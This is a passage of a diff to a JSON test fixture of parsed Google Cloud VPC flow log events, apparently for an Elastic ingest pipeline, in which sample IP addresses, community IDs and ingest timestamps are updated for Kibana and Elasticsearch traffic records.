"{\"insertId\":\"198begsfh44xy6\",\"jsonPayload\":{\"bytes_sent\":\"1782\",\"connection\":{\"dest_ip\":\"203.0.113.12\",\"dest_port\":53972,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:44:20.748121914Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:44:20.634231041Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", + "ingested": "2021-12-09T13:37:46.392049Z", + "original": "{\"insertId\":\"198begsfh44xy6\",\"jsonPayload\":{\"bytes_sent\":\"1782\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":53972,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:44:20.748121914Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:44:20.634231041Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", "kind": "event", "start": "2019-06-14T03:44:20.634231041Z", "end": "2019-06-14T03:44:20.748121914Z", @@ -15816,18 +15816,18 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33530, "bytes": 68545, "domain": "kibana", - "ip": "203.0.113.134", + "ip": "67.43.156.13", "packets": 368 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:EnH+d3/qmomg2hTDB2XhQfZVi90=", + "community_id": "1:2r+9oNITMpL8veN57VUSy8JQkp0=", "bytes": 68545, "name": "default", "transport": "tcp", @@ -15849,7 +15849,7 @@ }, "related": { "ip": [ - "203.0.113.134", + "67.43.156.13", "10.139.99.242" ] }, @@ -15886,8 +15886,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869008900Z", - "original": "{\"insertId\":\"198begsfh44xxx\",\"jsonPayload\":{\"bytes_sent\":\"68545\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.134\",\"src_port\":33530},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:52.205089801Z\",\"packets_sent\":\"368\",\"reporter\":\"DEST\",\"rtt_msec\":\"163\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.140301693Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", + "ingested": "2021-12-09T13:37:46.392053400Z", + "original": "{\"insertId\":\"198begsfh44xxx\",\"jsonPayload\":{\"bytes_sent\":\"68545\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33530},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:52.205089801Z\",\"packets_sent\":\"368\",\"reporter\":\"DEST\",\"rtt_msec\":\"163\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.140301693Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", "kind": "event", "start": "2019-06-14T03:40:00.140301693Z", "end": "2019-06-14T03:49:52.205089801Z", @@ -15916,17 +15916,17 @@ "as": { "number": 33652 }, - "address": "203.0.113.58", + "address": "67.43.156.13", "port": 65274, "bytes": 74613, - "ip": "203.0.113.58", + "ip": "67.43.156.13", "packets": 745 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:okS/edCC5y2BJIxXO7dhFGGEAo8=", + "community_id": "1:x8d/OIPY4zsghmchjpMb6iKfgGo=", "bytes": 74613, "transport": "tcp", "type": "ipv4", @@ -15940,7 +15940,7 @@ }, "related": { "ip": [ - "203.0.113.58", + "67.43.156.13", "10.139.99.242" ] }, @@ -15965,8 +15965,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869012400Z", - "original": "{\"insertId\":\"198begsfh44xy4\",\"jsonPayload\":{\"bytes_sent\":\"74613\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.58\",\"src_port\":65274},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.220838853Z\",\"packets_sent\":\"745\",\"reporter\":\"DEST\",\"rtt_msec\":\"209\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:40:01.270996793Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", + "ingested": "2021-12-09T13:37:46.392057800Z", + "original": "{\"insertId\":\"198begsfh44xy4\",\"jsonPayload\":{\"bytes_sent\":\"74613\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":65274},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.220838853Z\",\"packets_sent\":\"745\",\"reporter\":\"DEST\",\"rtt_msec\":\"209\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:40:01.270996793Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", "kind": "event", "start": "2019-06-14T03:40:01.270996793Z", "end": "2019-06-14T03:49:56.220838853Z", @@ -15995,17 +15995,17 @@ "as": { "number": 33652 }, - "address": "203.0.113.58", + "address": "67.43.156.13", "port": 53879, "bytes": 74942, - "ip": "203.0.113.58", + "ip": "67.43.156.13", "packets": 726 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:RJnXD8bwo6xYMLMKaPN85qjHcdQ=", + "community_id": "1:AkCFUf83/4ycKxpQQkP7p7l9aqs=", "bytes": 74942, "transport": "tcp", "type": "ipv4", @@ -16019,7 +16019,7 @@ }, "related": { "ip": [ - "203.0.113.58", + "67.43.156.13", "10.139.99.242" ] }, @@ -16044,8 +16044,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869015500Z", - "original": "{\"insertId\":\"198begsfh44xy1\",\"jsonPayload\":{\"bytes_sent\":\"74942\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.58\",\"src_port\":53879},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.312105537Z\",\"packets_sent\":\"726\",\"reporter\":\"DEST\",\"rtt_msec\":\"176\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:40:00.760414869Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", + "ingested": "2021-12-09T13:37:46.392062300Z", + "original": "{\"insertId\":\"198begsfh44xy1\",\"jsonPayload\":{\"bytes_sent\":\"74942\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":53879},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:56.312105537Z\",\"packets_sent\":\"726\",\"reporter\":\"DEST\",\"rtt_msec\":\"176\",\"src_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"start_time\":\"2019-06-14T03:40:00.760414869Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", "kind": "event", "start": "2019-06-14T03:40:00.760414869Z", "end": "2019-06-14T03:49:56.312105537Z", @@ -16072,17 +16072,17 @@ "as": { "number": 15169 }, - "address": "203.0.113.27", + "address": "67.43.156.13", "port": 34450, "bytes": 1467, - "ip": "203.0.113.27", + "ip": "67.43.156.13", "packets": 7 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:mjrSMbGpta0wXfm0rttjlUEE5S4=", + "community_id": "1:0xYaSZA1hg8djQzHMsHV0LC9xJY=", "bytes": 1467, "transport": "tcp", "type": "ipv4", @@ -16096,7 +16096,7 @@ }, "related": { "ip": [ - "203.0.113.27", + "67.43.156.13", "10.87.40.76" ] }, @@ -16121,8 +16121,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869018600Z", - "original": "{\"insertId\":\"198begsfh44xxp\",\"jsonPayload\":{\"bytes_sent\":\"1467\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"203.0.113.27\",\"src_port\":34450},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:47:38.299054333Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:47:38.189569840Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", + "ingested": "2021-12-09T13:37:46.392066700Z", + "original": "{\"insertId\":\"198begsfh44xxp\",\"jsonPayload\":{\"bytes_sent\":\"1467\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":34450},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:47:38.299054333Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:47:38.189569840Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", "kind": "event", "start": "2019-06-14T03:47:38.189569840Z", "end": "2019-06-14T03:47:38.299054333Z", @@ -16145,9 +16145,9 @@ "as": { "number": 33652 }, - "address": "203.0.113.58", + "address": "67.43.156.13", "port": 65274, - "ip": "203.0.113.58" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -16161,7 +16161,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:okS/edCC5y2BJIxXO7dhFGGEAo8=", + "community_id": "1:x8d/OIPY4zsghmchjpMb6iKfgGo=", "bytes": 121593, "transport": "tcp", "type": "ipv4", @@ -16176,7 +16176,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.58" + "67.43.156.13" ] }, "gcp": { @@ -16200,8 +16200,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869021400Z", - "original": "{\"insertId\":\"198begsfh44xxv\",\"jsonPayload\":{\"bytes_sent\":\"121593\",\"connection\":{\"dest_ip\":\"203.0.113.58\",\"dest_port\":65274,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.220838853Z\",\"packets_sent\":\"610\",\"reporter\":\"SRC\",\"rtt_msec\":\"209\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:01.270996793Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", + "ingested": "2021-12-09T13:37:46.392071500Z", + "original": "{\"insertId\":\"198begsfh44xxv\",\"jsonPayload\":{\"bytes_sent\":\"121593\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":65274,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.220838853Z\",\"packets_sent\":\"610\",\"reporter\":\"SRC\",\"rtt_msec\":\"209\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:01.270996793Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", "kind": "event", "start": "2019-06-14T03:40:01.270996793Z", "end": "2019-06-14T03:49:56.220838853Z", @@ -16228,17 +16228,17 @@ "as": { "number": 15169 }, - "address": "203.0.113.27", + "address": "67.43.156.13", "port": 60968, "bytes": 1464, - "ip": "203.0.113.27", + "ip": "67.43.156.13", "packets": 7 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:FaCnDl7uWc7lOELNsyeufwQIgPc=", + "community_id": "1:E0Auuo+7QQ3cb588odS6yJLxVyU=", "bytes": 1464, "transport": "tcp", "type": "ipv4", @@ -16252,7 +16252,7 @@ }, "related": { "ip": [ - "203.0.113.27", + "67.43.156.13", "10.87.40.76" ] }, @@ -16277,8 +16277,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869024400Z", - "original": "{\"insertId\":\"198begsfh44xy7\",\"jsonPayload\":{\"bytes_sent\":\"1464\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"203.0.113.27\",\"src_port\":60968},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:43:39.777977145Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:43:39.653136947Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", + "ingested": "2021-12-09T13:37:46.392077100Z", + "original": "{\"insertId\":\"198begsfh44xy7\",\"jsonPayload\":{\"bytes_sent\":\"1464\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":60968},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:43:39.777977145Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:43:39.653136947Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", "kind": "event", "start": "2019-06-14T03:43:39.653136947Z", "end": "2019-06-14T03:43:39.777977145Z", @@ -16299,10 +16299,10 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33530, "domain": "kibana", - "ip": "203.0.113.134" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -16316,7 +16316,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:EnH+d3/qmomg2hTDB2XhQfZVi90=", + "community_id": "1:2r+9oNITMpL8veN57VUSy8JQkp0=", "bytes": 177471, "name": "default", "transport": "tcp", @@ -16339,7 +16339,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.134" + "67.43.156.13" ] }, "gcp": { @@ -16375,8 +16375,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869029500Z", - "original": "{\"insertId\":\"198begsfh44xxs\",\"jsonPayload\":{\"bytes_sent\":\"177471\",\"connection\":{\"dest_ip\":\"203.0.113.134\",\"dest_port\":33530,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:52.205194199Z\",\"packets_sent\":\"246\",\"reporter\":\"SRC\",\"rtt_msec\":\"163\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.140301693Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", + "ingested": "2021-12-09T13:37:46.392082700Z", + "original": "{\"insertId\":\"198begsfh44xxs\",\"jsonPayload\":{\"bytes_sent\":\"177471\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33530,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:52.205194199Z\",\"packets_sent\":\"246\",\"reporter\":\"SRC\",\"rtt_msec\":\"163\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.140301693Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", "kind": "event", "start": "2019-06-14T03:40:00.140301693Z", "end": "2019-06-14T03:49:52.205194199Z", @@ -16399,9 +16399,9 @@ "as": { "number": 33652 }, - "address": "203.0.113.58", + "address": "67.43.156.13", "port": 65275, - "ip": "203.0.113.58" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -16415,7 +16415,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:HecAvf3EWM638zAmzah9YroP5sc=", + "community_id": "1:pagRMjC+skHhrGE9uXpcDCyM7tk=", "bytes": 53315, "transport": "tcp", "type": "ipv4", @@ -16430,7 +16430,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.58" + "67.43.156.13" ] }, "gcp": { @@ -16454,8 +16454,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.869032500Z", - "original": "{\"insertId\":\"198begsfh44xxq\",\"jsonPayload\":{\"bytes_sent\":\"53315\",\"connection\":{\"dest_ip\":\"203.0.113.58\",\"dest_port\":65275,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.316847800Z\",\"packets_sent\":\"588\",\"reporter\":\"SRC\",\"rtt_msec\":\"82\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.565734921Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:17.291787305Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:17.291787305Z\"}", + "ingested": "2021-12-09T13:37:46.392088300Z", + "original": 